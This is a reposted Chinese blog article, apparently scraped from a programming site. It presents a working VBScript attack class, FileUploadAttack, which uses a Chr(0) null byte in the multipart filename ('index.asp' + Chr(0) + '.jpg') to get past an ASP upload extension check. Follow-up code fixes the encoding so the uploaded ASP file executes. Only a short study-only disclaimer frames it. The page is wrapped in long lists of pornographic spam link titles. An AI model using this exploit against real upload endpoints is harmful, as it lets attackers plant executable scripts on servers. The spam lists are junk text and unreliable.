亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 編程 > ASP > 正文

ASP上傳漏洞之利用CHR(0)繞過擴展名檢測腳本

2024-05-04 11:08:10
字體:
來源:轉載
供稿:網友
本文部分腳本具有攻擊性,僅供學習研究用,請用在合法合理范圍內,對造成的損失本人不承擔責任,本人也不提供黑客攻擊技術指導
 
 
 

今天Demon 提到了這個問題,正好想到之前看到的一篇文章《Automatic file upload using IE+ADO without user interaction - VBSscript》 。這篇文章給出了本地無交互自動上傳腳本的示例,正好今天可以借來一用,原腳本利用了InternetExplorer.Application組件,我改寫了一下,用WinHttp.WinHttpRequest.5.1實現了類似的功能,關于這個組件更多的用法請參考《WinHttpRequest Object Reference》 。

復制代碼代碼如下:

Option Explicit 

Function file_get_contents(filename) 
Dim fso, f 
Set fso = WSH.CreateObject("Scripting.FilesystemObject") 
Set f = fso.OpenTextFile(filename, 1) 
file_get_contents = f.ReadAll 
f.Close 
Set f = Nothing 
Set fso = Nothing 
End Function 

' 代碼修改自 http://www.motobit.com/tips/detpg_uploadvbsie/ 
Class FileUploadAttack 
Private m_objWinHttp 
Private m_strUrl 
Private m_strFieldName 

Private Sub Class_Initialize() 
Set m_objWinHttp = WSH.CreateObject( _ 
"WinHttp.WinHttpRequest.5.1") 
End Sub 

Private Sub Class_Terminate() 
Set m_objWinHttp = Nothing 
End Sub 

Public Sub setUrl(url) 
m_strUrl = url 
End Sub 

Public Sub setFieldName(name) 
m_strFieldName = name 
End Sub 

'Infrormations In form field header. 
Function mpFields(FieldName, FileName, ContentType) 
Dim MPTemplate 'template For multipart header 
MPTemplate = "Content-Disposition: form-data; name=""{field}"";" + _ 
" filename=""{file}""" + vbCrLf + _ 
"Content-Type: {ct}" + vbCrLf + vbCrLf 
Dim Out 
Out = Replace(MPTemplate, "{field}", FieldName) 
Out = Replace(Out, "{file}", FileName) 
mpFields = Replace(Out, "{ct}", ContentType) 
End Function 
'Converts OLE string To multibyte string 
Function StringToMB(S) 
Dim I, B 
For I = 1 To Len(S) 
B = B & ChrB(Asc(Mid(S, I, 1))) 
Next 
StringToMB = B 
End Function 

'Build multipart/form-data document with file contents And header info 
Function BuildFormData(FileContents, Boundary, _ 
FileName, FieldName) 
Dim FormData, Pre, Po 
Const ContentType = "application/upload" 

'The two parts around file contents In the multipart-form data. 
Pre = "--" + Boundary + vbCrLf + mpFields(FieldName, _ 
FileName, ContentType) 
Po = vbCrLf + "--" + Boundary + "--" + vbCrLf 

'Build form data using recordset binary field 
Const adLongVarBinary = 205 
Dim RS: Set RS = WSH.CreateObject("ADODB.Recordset") 
RS.Fields.Append "b", adLongVarBinary, _ 
Len(Pre) + LenB(FileContents) + Len(Po) 
RS.Open 
RS.AddNew 
Dim LenData 
'Convert Pre string value To a binary data 
LenData = Len(Pre) 
RS("b").AppendChunk (StringToMB(Pre) & ChrB(0)) 
Pre = RS("b").GetChunk(LenData) 
RS("b") = "" 

'Convert Po string value To a binary data 
LenData = Len(Po) 
RS("b").AppendChunk (StringToMB(Po) & ChrB(0)) 
Po = RS("b").GetChunk(LenData) 
RS("b") = "" 

'Join Pre + FileContents + Po binary data 
RS("b").AppendChunk (Pre) 
RS("b").AppendChunk (FileContents) 
RS("b").AppendChunk (Po) 
RS.Update 
FormData = RS("b") 
RS.Close 
BuildFormData = FormData 
End Function 


Public Function sendFile(fileName) 
Const Boundary = "---------------------------0123456789012" 
m_objWinHttp.Open "POST", m_strUrl, False 
m_objWinHttp.setRequestHeader "Content-Type", _ 
"multipart/form-data; boundary=" + Boundary 

Dim FileContents, FormData 
'Get source file As a binary data. 
FileContents = file_get_contents(FileName) 

' 下面構造了惡意文件擴展名Chr(0) & .jpg 
'Build multipart/form-data document 
FormData = BuildFormData(FileContents, Boundary, _ 
FileName & Chr(0) & ".jpg", m_strFieldName) 

m_objWinHttp.send FormData 
sendFile = m_objWinHttp.Status 
End Function 

Public Function getText() 
getText = m_objWinHttp.ResponseText 
End Function 
End Class 

Function VBMain() 
VBMain = 0 

Dim fileUpload 
Set fileUpload = New FileUploadAttack 
' 需要修改下面內容為合適內容 
' 上傳url 
fileUpload.setUrl "http://localhost/upload/uploadfile.asp" 
fileUpload.setFieldName "filepath" ' 上傳表單框的name 
' 需上傳文件路徑 
If fileUpload.sendFile("E:/projects/asp/index.asp")=200 Then 
MsgBox "上傳成功" & fileUpload.getText() 
Else 
MsgBox "失敗" 
End If 
Set fileUpload = Nothing 
End Function 

Call WScript.Quit(VBMain()) 

上傳功能是隨便在網上找的一個簡單上傳ASP文件,然后加入我在文章中《ASP/VBScript中CHR(0)的由來以及帶來的安全問題》所述的GetFileExtensionName判斷擴展名是否是jpg。 

測試結果是:手動上傳asp,失??;利用上述攻擊腳本上傳asp文件,成功!在上傳目錄中確實是asp文件,通過瀏覽器URL也能訪問這個asp文件,只是奇怪的是顯示一片空白,我這里是IIS 7,難道是IIS版本問題,或許是file_get_contents應該返回文件的二進制流?好了,這個問題先擱在這兒,還有其他事,先閃了。 

所有實驗代碼包,在這里upload.zip(代碼BUG參考下面更新說明)下載。 

2011年12月25日更新 

根據大家反饋的上傳文件變成Unicode Little Endian編碼問題,首先抱歉的是當時確實偷懶了,主要代碼參考的老外的,而且老外說明了一下GetFile這個函數獲取文件二進制數據,沒找到這個函數實現,也懶得去弄二進制讀取,直接搞了個file_get_contents獲取文本數據,事實證明這樣確實存在問題,下面我把補救措施說明一下吧,還是偷懶一下,直接在現有的基礎上將文本數據轉換為二進制數據。使用ADODB.Stream組件,函數如下: 

復制代碼代碼如下:

' 將指定charset的字符串str轉換為二進制 
Function strtobin(str, charset) 
With WSH.CreateObject("ADODB.Stream") 
.Type = 2 
.Mode = 3 
.Open 
.Charset = charset 
.WriteText str 
.Flush 
.Position = 0 
.Type = 1 

strtobin = .Read() 
.Close 
End With 
End Function 

然后將上述代碼的第106行改成下面這樣(以ASCII讀取文本): 

復制代碼代碼如下:

FileContents = strtobin(file_get_contents(FileName), "ASCII") 

這樣改過后上傳的ASP文件就是普通編碼的文件了,然后瀏覽器訪問這個文件,可以看到該ASP被成功解析。 

不過這里覺得啰嗦了一點,其實可以直接以二進制打開文件并返回數據,這里進行了兩步:1.以文本方式讀取文件;2.將文本轉換為二進制數據。一步到位的代碼可以參考下面一次以二進制Byte()方式讀取文件數據的函數: 

復制代碼代碼如下:

'Returns file contents As a binary data 
Function GetFile(FileName) 
Dim Stream: Set Stream = CreateObject("ADODB.Stream") 
Stream.Type = 1 'Binary 
Stream.Open 
Stream.LoadFromFile FileName 
GetFile = Stream.Read 
Stream.Close 
Set Stream = Nothing 
End Function 

更優化的代碼我就不寫了,主要說明的是一個上傳思路,如果大家希望得到完善的上傳實現,可以參考Demon的《VBS模擬POST上傳文件》 。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
欧美日韩中文字幕| 57pao国产成人免费| 91影视免费在线观看| 成人午夜激情网| 欧美成人免费网| 午夜精品三级视频福利| 亚洲第一福利网站| 亚洲a级在线播放观看| 日韩av影片在线观看| 亚洲a在线播放| www日韩欧美| 亚洲一区二区三区777| 国产不卡精品视男人的天堂| 萌白酱国产一区二区| 热99精品里视频精品| 色久欧美在线视频观看| 日韩视频―中文字幕| 91视频88av| 国产精品视频最多的网站| 国产精品吴梦梦| 欧美大荫蒂xxx| 欧美肥老妇视频| 综合国产在线观看| 最近2019中文免费高清视频观看www99| 欧美精品在线播放| 国产69久久精品成人| 国产综合香蕉五月婷在线| 中文字幕精品在线视频| 亚洲一区二区久久久| 欧美日韩国产色视频| 日韩av综合网站| 亚洲精品日韩激情在线电影| 国产精品影院在线观看| 国产精品三级久久久久久电影| 97久久精品在线| 中文字幕少妇一区二区三区| 中文字幕欧美亚洲| 久久天堂电影网| 精品中文视频在线| 欧美日韩在线视频一区二区| 成人在线免费观看视视频| 亚洲视频视频在线| 亚洲欧美国产va在线影院| 欧洲中文字幕国产精品| 亚洲欧美中文日韩在线v日本| 亚洲成色www8888| 精品呦交小u女在线| 亚洲精品在线观看www| 国产精品网红直播| 国产做受69高潮| 2019国产精品自在线拍国产不卡| 欧美日韩一区二区在线| 亚洲性生活视频| 国产精品影片在线观看| xvideos亚洲人网站| 久久久视频免费观看| 亚洲人午夜色婷婷| 日韩欧美第一页| 久久深夜福利免费观看| 国产日韩欧美在线| 国产在线观看不卡| 国产日韩欧美视频在线| 欧美亚洲一区在线| 91精品在线看| 亚洲影院污污.| 亚洲97在线观看| 日韩中文在线不卡| 中文字幕在线亚洲| 68精品久久久久久欧美| 亚洲自拍偷拍在线| 久久综合久久美利坚合众国| 日本久久久久亚洲中字幕| 欧美插天视频在线播放| 在线观看不卡av| 久久精品色欧美aⅴ一区二区| 日韩高清电影好看的电视剧电影| 疯狂做受xxxx欧美肥白少妇| 久久av在线看| 自拍亚洲一区欧美另类| 国产69精品久久久久9| 91免费高清视频| 黄色成人在线免费| 亚洲最大成人免费视频| 麻豆乱码国产一区二区三区| 欧美性猛交xxxx免费看久久久| 久久久在线免费观看| 欧美在线视频导航| 国产精品久久久久久久久久久久久| 亚洲欧美国产制服动漫| 97精品视频在线播放| 97碰在线观看| 国产91精品不卡视频| 亚洲国产又黄又爽女人高潮的| 久久久久国产精品www| 精品国产乱码久久久久久虫虫漫画| 久久九九有精品国产23| 欧美成人激情图片网| 国产精品久久97| 亚洲欧美日韩一区二区三区在线| 欧美日韩综合视频| 91免费人成网站在线观看18| 亚洲精品一区久久久久久| 国产成人短视频| 欧美日韩在线看| 深夜福利91大全| 欧美日韩中文在线观看| 午夜美女久久久久爽久久| 亚洲色图日韩av| 国产精品美女主播在线观看纯欲| 久久天天躁日日躁| 欧日韩不卡在线视频| 91精品国产综合久久久久久久久| 国产精品免费看久久久香蕉| 最近2019年手机中文字幕| 亚洲激情视频在线观看| 亚洲国产97在线精品一区| 亚洲国产私拍精品国模在线观看| 91网站在线免费观看| 日韩经典中文字幕| 久久视频在线免费观看| 欧美性猛交xxxx乱大交极品| 九九久久国产精品| 亚洲精品一区久久久久久| 伊人久久久久久久久久久| 在线色欧美三级视频| 亚洲精美色品网站| 久久久精品在线观看| 亚洲色图18p| xxx欧美精品| 国产在线精品一区免费香蕉| 国产欧美日韩精品专区| 亚洲欧美激情精品一区二区| 久久久久久久91| 亚洲久久久久久久久久| 国产精品成人观看视频国产奇米| 国产精品亚洲аv天堂网| 国内免费精品永久在线视频| 91精品国产亚洲| 亚洲精品国产精品国自产在线| 91在线免费视频| 日韩电影免费在线观看| 在线激情影院一区| 精品久久久一区| 欧美一级电影免费在线观看| 亚洲成人黄色在线观看| 日韩欧美在线视频免费观看| 午夜精品久久17c| 精品国产一区二区三区四区在线观看| 国产成人精品久久二区二区| 国产精品久久久久久久久久久久久久| 91精品国产91久久久久福利| 欧美尺度大的性做爰视频| 深夜成人在线观看| 日本人成精品视频在线| 欧美一区二区视频97| 亚洲天堂一区二区三区| 亚洲国产成人在线播放| 亚洲国产精品视频在线观看| 久久久免费观看| 亚洲国产精品福利| 国产xxx69麻豆国语对白| 黑人巨大精品欧美一区二区三区| 亚洲男人天堂古典| 久久综合伊人77777尤物|